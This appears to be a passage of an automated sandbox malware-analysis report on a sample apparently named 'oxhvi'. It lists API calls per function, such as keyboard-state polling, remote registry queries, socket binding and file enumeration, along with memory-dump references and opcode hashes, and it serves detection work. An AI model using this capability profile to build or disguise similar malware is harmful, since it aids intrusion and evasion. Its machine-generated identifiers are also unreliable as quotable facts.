                                                                                                                                                        • Part of subcall function 0059DB69: FindClose.KERNEL32(00000000), ref: 0059DC58
                                                                                                                                                      • GetLastError.KERNEL32 ref: 005A6583
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2191629493-0
                                                                                                                                                      • Opcode ID: 9bda559805b314c6e9d287d7beb819718c24c5f9819f4d18b23b83ae4dc62dcd
                                                                                                                                                      • Instruction ID: bd354232fec5ab360dd3f646f0468fe20af9d3c359f06ee922986148acff300e
                                                                                                                                                      • Opcode Fuzzy Hash: 9bda559805b314c6e9d287d7beb819718c24c5f9819f4d18b23b83ae4dc62dcd
                                                                                                                                                      • Instruction Fuzzy Hash: C6F082312006058FCB14EF58D849B6EBBE5BF98720F048419F94987351CB70FC018B94
                                                                                                                                                      Function 00537953 Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CloseHandle.KERNELBASE(?,?,00000000,00573A1C), ref: 00537973
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                      • Opcode ID: 1809efec64cdbea6447a8eff9eaa2c5f3caf9c21f7612a05253f0e7bc236efce
                                                                                                                                                      • Instruction ID: 63e3e98e45f6245ba370a90abb6207d71efa11a227ef147ae766350c07389bdd
                                                                                                                                                      • Opcode Fuzzy Hash: 1809efec64cdbea6447a8eff9eaa2c5f3caf9c21f7612a05253f0e7bc236efce
                                                                                                                                                      • Instruction Fuzzy Hash: C2E092B6804B12CFC3314F1AE804412FBF4FEE67717204B2ED0E592660D3B0588ADB50

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Function 005AA0FA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 005AA11B
                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 005AA176
                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 005AA181
                                                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 005AA19D
                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 005AA1ED
                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(005F7B94), ref: 005AA20B
                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 005AA215
                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 005AA222
                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 005AA232
                                                                                                                                                        • Part of subcall function 0059E2AE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0059E2C9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                      • String ID: *.*
                                                                                                                                                      • API String ID: 2640511053-438819550
                                                                                                                                                      • Opcode ID: 21b138c219f935496d9dd1a324f5ff182d7f7e7862caee6df09046791a08fcdd
                                                                                                                                                      • Instruction ID: 1145477f1cf870f4e0bfc4ffa47991312ef46f5ce45ae8ef8addfaff7b3be53a
                                                                                                                                                      • Opcode Fuzzy Hash: 21b138c219f935496d9dd1a324f5ff182d7f7e7862caee6df09046791a08fcdd
                                                                                                                                                      • Instruction Fuzzy Hash: A831E33950161E6ECB10AFA4DC09EDE7BBDBF4A320F1001A6E811E3090EB35DE49CA61
                                                                                                                                                      Function 005BC7A3 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 005BD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,005BC00D,?,?), ref: 005BD314
                                                                                                                                                        • Part of subcall function 005BD2F7: _wcslen.LIBCMT ref: 005BD350
                                                                                                                                                        • Part of subcall function 005BD2F7: _wcslen.LIBCMT ref: 005BD3C7
                                                                                                                                                        • Part of subcall function 005BD2F7: _wcslen.LIBCMT ref: 005BD3FD
                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005BC89D
                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 005BC908
                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 005BC92C
                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 005BC98B
                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 005BCA46
                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 005BCAB3
                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 005BCB48
                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 005BCB99
                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 005BCC42
                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 005BCCE1
                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 005BCCEE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3102970594-0
                                                                                                                                                      • Opcode ID: c299e361ec8a8b8b352935d6b2a4c756e565a5f156a78aa4e22022cff13a6954
                                                                                                                                                      • Instruction ID: 92a10f2489c81d78c923472ae16f21e3f10df969665c1105e6c21514f187bb2d
                                                                                                                                                      • Opcode Fuzzy Hash: c299e361ec8a8b8b352935d6b2a4c756e565a5f156a78aa4e22022cff13a6954
                                                                                                                                                      • Instruction Fuzzy Hash: AD023B716042019FD714CF28C895E6ABFE5BF88314F18849DF85ADB2A2DB31ED46CB91
                                                                                                                                                      Function 0059A54A Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 0059A572
                                                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 0059A5F3
                                                                                                                                                      • GetKeyState.USER32(000000A0), ref: 0059A60E
                                                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 0059A628
                                                                                                                                                      • GetKeyState.USER32(000000A1), ref: 0059A63D
                                                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 0059A655
                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 0059A667
                                                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 0059A67F
                                                                                                                                                      • GetKeyState.USER32(00000012), ref: 0059A691
                                                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 0059A6A9
                                                                                                                                                      • GetKeyState.USER32(0000005B), ref: 0059A6BB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 541375521-0
                                                                                                                                                      • Opcode ID: 481992e9c6e56d827dd784cd2c35bffe4a79fe54d71812ccc4f875e270f79cf2
                                                                                                                                                      • Instruction ID: e39a8f69d6e6daf360f4acde2459eaaadeda96f9d8df3956591933b67e21a21e
                                                                                                                                                      • Opcode Fuzzy Hash: 481992e9c6e56d827dd784cd2c35bffe4a79fe54d71812ccc4f875e270f79cf2
                                                                                                                                                      • Instruction Fuzzy Hash: 40417474A04BC96EFF319A64C8147A5BEA0BB21344F09805DD5C64A5C2EBA499C8CBF7
                                                                                                                                                      Function 005B4089 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CoInitialize.OLE32 ref: 005B40D1
                                                                                                                                                      • CoUninitialize.OLE32 ref: 005B40DC
                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,005D0B44,?), ref: 005B4136
                                                                                                                                                      • IIDFromString.OLE32(?,?), ref: 005B41A9
                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 005B4241
                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 005B4293
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                      • API String ID: 636576611-1287834457
                                                                                                                                                      • Opcode ID: c006d3001c4132b7e0743a77e09e8350e9063691fce786b66cb90c02c5b1f599
                                                                                                                                                      • Instruction ID: dd388f87e9bafb6c958ed97303490a5f4d8882577af09023ed1dfeb396ad5ae3
                                                                                                                                                      • Opcode Fuzzy Hash: c006d3001c4132b7e0743a77e09e8350e9063691fce786b66cb90c02c5b1f599
                                                                                                                                                      • Instruction Fuzzy Hash: 4B617D746047019FD720DF68D889BAABFE8BF99714F000819F9819B292D770ED48DF92
                                                                                                                                                      Function 005AA488 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053B25F: _wcslen.LIBCMT ref: 0053B269
                                                                                                                                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 005AA4D5
                                                                                                                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 005AA5E8
                                                                                                                                                        • Part of subcall function 005A41CE: GetInputState.USER32 ref: 005A4225
                                                                                                                                                        • Part of subcall function 005A41CE: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005A42C0
                                                                                                                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 005AA505
                                                                                                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 005AA5D2
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                      • String ID: *.*
                                                                                                                                                      • API String ID: 1972594611-438819550
                                                                                                                                                      • Opcode ID: 239e68cb577843e8e51857eef688a8077ef0e307cecf41e54afbe6f33fdabf4c
                                                                                                                                                      • Instruction ID: c69b7bbf71a3fbdd36e87cc7871ff409f8e140a14d6bb897ed253a43733cd166
                                                                                                                                                      • Opcode Fuzzy Hash: 239e68cb577843e8e51857eef688a8077ef0e307cecf41e54afbe6f33fdabf4c
                                                                                                                                                      • Instruction Fuzzy Hash: EA416E7190020AAFDF55DFA4C849AEEBFB4FF5A310F14446AE805A2191E7309E44CB61
                                                                                                                                                      Function 0053225D Relevance: 7.8, APIs: 5, Instructions: 309COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • DefDlgProcW.USER32(?,?), ref: 005322EE
                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 005323C3
                                                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 005323D6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Color$Proc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 929743424-0
                                                                                                                                                      • Opcode ID: db237a90d7c2f38ff2e428241bcac08cd09aaedd2b8218f09a4cb6239da2f965
                                                                                                                                                      • Instruction ID: 732a903839bfc99233678bf608f090e958a023d9eaedf513f66bc743d9c6d963
                                                                                                                                                      • Opcode Fuzzy Hash: db237a90d7c2f38ff2e428241bcac08cd09aaedd2b8218f09a4cb6239da2f965
                                                                                                                                                      • Instruction Fuzzy Hash: 4381D1B0204859BEE72D6A3D9C9CE7F2F5DFB82310F154919F142C6696CA298F01F276
                                                                                                                                                      Function 005B2163 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 005B39AB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 005B39D7
                                                                                                                                                        • Part of subcall function 005B39AB: _wcslen.LIBCMT ref: 005B39F8
                                                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 005B21BA
                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 005B21E1
                                                                                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 005B2238
                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 005B2243
                                                                                                                                                      • closesocket.WSOCK32(00000000), ref: 005B2272
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1601658205-0
                                                                                                                                                      • Opcode ID: 3d37d0776302498163cf07ca399a02e41269f6be20003906c70cd6161d8befd6
                                                                                                                                                      • Instruction ID: 2475cac3f6a6a9f80a25154c58e26540940532c88f90a485a1816646d9bc033e
                                                                                                                                                      • Opcode Fuzzy Hash: 3d37d0776302498163cf07ca399a02e41269f6be20003906c70cd6161d8befd6
                                                                                                                                                      • Instruction Fuzzy Hash: A951B275A00611AFD710AF24C88AF6A7BE5BB84718F04805CF915AF3D3C670ED42CBA1
                                                                                                                                                      Function 005C25A0 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 292994002-0
                                                                                                                                                      • Opcode ID: 2efee74eb46349743e78fd846bb70fff95056544d643855402978eb10d7c7e2a
                                                                                                                                                      • Instruction ID: 268b6c53c84b17b127c5c2741b2813b71f52cd49754e33e6279f4b3cc568f7a7
                                                                                                                                                      • Opcode Fuzzy Hash: 2efee74eb46349743e78fd846bb70fff95056544d643855402978eb10d7c7e2a
                                                                                                                                                      • Instruction Fuzzy Hash: 8E219C313006418FD7208F5AD858F1A7FA5BF94324F18846CE84ACB251DB35EC82DBA0
                                                                                                                                                      Function 0059EBE5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0059EC19
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: mouse_event
                                                                                                                                                      • String ID: DOWN
                                                                                                                                                      • API String ID: 2434400541-711622031
                                                                                                                                                      • Opcode ID: 5d5f45665739958e33b9055c834b9a4f7d22e0ec3a3b4d89d367cfbbbaa34cbe
                                                                                                                                                      • Instruction ID: b5799172e2b534e6a15917009256918619b7f724268fe3f57351e66304cffef2
                                                                                                                                                      • Opcode Fuzzy Hash: 5d5f45665739958e33b9055c834b9a4f7d22e0ec3a3b4d89d367cfbbbaa34cbe
                                                                                                                                                      • Instruction Fuzzy Hash: F3E08C361DDB263CBE0421187D07DF60B8CAF26339B510247FC40E51C1ED885D8668A8
                                                                                                                                                      Function 005C0BA0 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 005C0C44
                                                                                                                                                      • _wcslen.LIBCMT ref: 005C0C7E
                                                                                                                                                      • _wcslen.LIBCMT ref: 005C0CE8
                                                                                                                                                      • _wcslen.LIBCMT ref: 005C0D50
                                                                                                                                                      • _wcslen.LIBCMT ref: 005C0DD4
                                                                                                                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 005C0E24
                                                                                                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 005C0E63
                                                                                                                                                        • Part of subcall function 0054FD60: _wcslen.LIBCMT ref: 0054FD6B
                                                                                                                                                        • Part of subcall function 00592ACF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00592AE8
                                                                                                                                                        • Part of subcall function 00592ACF: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00592B1A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                      • API String ID: 1103490817-719923060
                                                                                                                                                      • Opcode ID: ee7f5d2a79b5b90f2375f3e9ba502807cd48a3cd9866e8c193aa9efab4b4b9e4
                                                                                                                                                      • Instruction ID: 84f059095063419a1b681571ccba65364adc3a54f149a4e735d3251f8c774829
                                                                                                                                                      • Opcode Fuzzy Hash: ee7f5d2a79b5b90f2375f3e9ba502807cd48a3cd9866e8c193aa9efab4b4b9e4
                                                                                                                                                      • Instruction Fuzzy Hash: FBE1AB31208606CFCB14EF68C445E7ABBE6FF98314B14495CF896AB2A2DB30ED45CB51
                                                                                                                                                      Function 005324C3 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0053259A
                                                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 005325A2
                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005325CD
                                                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 005325D5
                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 005325FA
                                                                                                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00532617
                                                                                                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00532627
                                                                                                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0053265A
                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0053266E
